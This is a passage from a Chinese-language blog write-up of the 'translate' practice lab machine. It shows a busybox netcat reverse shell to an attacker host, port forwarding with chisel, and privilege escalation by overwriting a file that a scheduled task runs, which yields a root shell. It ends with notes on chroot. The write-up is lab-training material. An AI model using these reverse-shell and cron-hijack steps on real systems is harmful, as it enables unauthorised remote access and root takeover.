<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs ruby">www-data<span class="hljs-variable">@translate</span><span class="hljs-symbol">:/tmp</span><span class="hljs-variable">$ </span>echo <span class="hljs-string">&#x27;busybox nc 192.168.122.222 1234 -e /bin/bash&#x27;</span> &gt; <span class="hljs-regexp">/tmp/test</span>.sh<br>www-data<span class="hljs-variable">@translate</span><span class="hljs-symbol">:/tmp</span><span class="hljs-variable">$ </span>chmod <span class="hljs-number">777</span> test.sh <br>www-data<span class="hljs-variable">@translate</span><span class="hljs-symbol">:/tmp</span><span class="hljs-variable">$ </span><br><br>┌──(root㉿kali)-[~]<br>└─<span class="hljs-comment"># nc -lvp 1234</span><br>listening on [any] <span class="hljs-number">1234</span> ...<br></code></pre></td></tr></table></figure>

<p>但是没有反弹回来，这又是为什么？<br>原因：www-data的shell是反弹回来的shell，并不是真正的shell（不是真正的根目录，是嵌入得到的结果）tmp隔离了</p>
<p>查看一下网络连接：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">www</span>-data@translate:/tmp$ ss -lnutp<br><span class="hljs-attribute">Netid</span>     State      Recv-Q     Send-Q         Local Address:Port         Peer Address:Port            udp       UNCONN     <span class="hljs-number">0</span>          <span class="hljs-number">0</span>                    <span class="hljs-number">0.0.0.0:68</span>                <span class="hljs-number">0.0.0.0</span>:*             <br><span class="hljs-attribute">tcp</span>       LISTEN     <span class="hljs-number">0</span>          <span class="hljs-number">128</span>                  <span class="hljs-number">0.0.0.0:22</span>                <span class="hljs-number">0.0.0.0</span>:*             <br><span class="hljs-attribute">tcp</span>       LISTEN     <span class="hljs-number">0</span>          <span class="hljs-number">128</span>                <span class="hljs-number">127.0.0.1:8000</span>              <span class="hljs-number">0.0.0.0</span>:*             <br><span class="hljs-attribute">tcp</span>       LISTEN     <span class="hljs-number">0</span>          <span class="hljs-number">128</span>                  <span class="hljs-number">0.0.0.0:5001</span>              <span class="hljs-number">0.0.0.0</span>:*        users:((<span class="hljs-string">&quot;python3&quot;</span>,pid=<span class="hljs-number">374</span>,fd=<span class="hljs-number">3</span>))     <br><span class="hljs-attribute">tcp</span>       LISTEN     <span class="hljs-number">0</span>          <span class="hljs-number">128</span>                    <span class="hljs-meta"> [::]:22                   [::]:*             </span><br><span class="hljs-meta">tcp       LISTEN     0          128                        *:80                      *:*       </span><br></code></pre></td></tr></table></figure>

<p>发现有个8000的内部端口，需要给它转发出来</p>
<p>靶机： </p>
<blockquote>
<p>.&#x2F;chisel client 192.168.122.222:7080 R:1111:127.0.0.1:8000</p>
</blockquote>
<p>kali:</p>
<blockquote>
<p>.&#x2F;chisel server -p 7080 –reverse</p>
</blockquote>
<p><img src="/./img/Snipaste_2025-06-03_23-26-43.png" srcset="/img/loading.gif" lazyload></p>
<p>成功转发：</p>
<p><img src="/./img/Snipaste_2025-06-03_23-27-47.png" srcset="/img/loading.gif" lazyload></p>
<p>思路：</p>
<p>前提知识点：</p>
<p>welcome用户 可以进入到标准的tmp目录中去，</p>
<p>www-data 反弹回来的shell不能进入完整的tmp目录</p>
<p>利用可以进入tmp完整目录的文件user.txt（welecome用户的文件）替换掉不完整的tmp文件中的内容（计划任务可以进行触发）</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs elixir">www-data<span class="hljs-variable">@translate</span><span class="hljs-symbol">:/tmp</span><span class="hljs-variable">$ </span>cat test.sh <br>busybox nc <span class="hljs-number">192.168</span>.<span class="hljs-number">122.222</span> <span class="hljs-number">1234</span> -e /bin/bash<br>www-data<span class="hljs-variable">@translate</span><span class="hljs-symbol">:/tmp</span><span class="hljs-variable">$ </span>cd /home/welcome/<br>www-data<span class="hljs-variable">@translate</span><span class="hljs-symbol">:/home/welcome</span><span class="hljs-variable">$ </span>cat /tmp/test.sh &gt; user.txt <br>www-data<span class="hljs-variable">@translate</span><span class="hljs-symbol">:/home/welcome</span><span class="hljs-variable">$ </span>cat user.txt <br>busybox nc <span class="hljs-number">192.168</span>.<span class="hljs-number">122.222</span> <span class="hljs-number">1234</span> -e /bin/bash<br>www-data<span class="hljs-variable">@translate</span><span class="hljs-symbol">:/home/welcome</span><span class="hljs-variable">$ </span><br></code></pre></td></tr></table></figure>

<p><img src="/./img/Snipaste_2025-06-03_23-39-57.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/./img/Snipaste_2025-06-03_23-39-57.png" srcset="/img/loading.gif" lazyload></p>
<p>监听即可拿到root</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs routeros">┌──(root㉿kali)-[~]<br>└─# nc -lvp 1234<br>listening on [any] 1234 <span class="hljs-built_in">..</span>.<br>id<br>192.168.122.75: inverse host lookup failed: Unknown host<br>connect <span class="hljs-keyword">to</span> [192.168.122.222] <span class="hljs-keyword">from</span> (UNKNOWN) [192.168.122.75] 54276<br><span class="hljs-attribute">uid</span>=0(root) <span class="hljs-attribute">gid</span>=0(root) <span class="hljs-attribute">groups</span>=0(root)<br></code></pre></td></tr></table></figure>

<p><img src="/./img/Snipaste_2025-06-04_00-43-37.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="补充："><a href="#补充：" class="headerlink" title="补充："></a>补充：</h2><p>chroot</p>
<p> 核心功能与用途</p>
<ol>
<li><strong>创建隔离环境</strong><br>借助 <code>chroot</code>，能够打造出一个与主机系统相隔离的环境，这个环境拥有独立的文件系统。在这个隔离环境中运行的程序无法访问外部的文件，这一特性使得它在安全测试或者运行不可信程序时非常实用。</li>
<li><strong>系统修复</strong><br>当系统出现故障无法正常启动时，可以通过从 LiveCD 启动并使用 <code>chroot</code> 切换到受损系统的根目录，进而进行系统修复操作，比如重新安装引导程序。</li>
<li><strong>软件测试</strong><br>可以使用 <code>chroot</code> 创建一个干净的测试环境，在这个环境中安装和运行软件，这样就能避免对主机系统造成影响。</li>
<li><strong>轻量级容器</strong><br><code>chroot</code> 是实现容器技术（像 Docker）的基础组件之一，不过它的隔离性相对较弱。</li>
</ol>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Maze-sec%E9%9D%B6%E6%9C%BA%E7%B3%BB%E5%88%97/" class="category-chain-item">Maze-sec靶机系列</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%A4%8D%E7%9B%98/" class="print-no-link">#复盘</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>translate靶机复盘</div>
      <div>http://example.com/2025/06/02/translate靶机复盘/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>XCDH</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年6月2日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/06/03/Java%E5%88%86%E5%B1%82%E6%80%9D%E6%83%B3/" title="Java分层思想">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Java分层思想</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/06/02/JavaWeb%E5%9F%BA%E7%A1%80%E4%B8%8B/" title="JavaWeb基础下">
                        <span class="hidden-mobile">JavaWeb基础下</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>XCDH</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
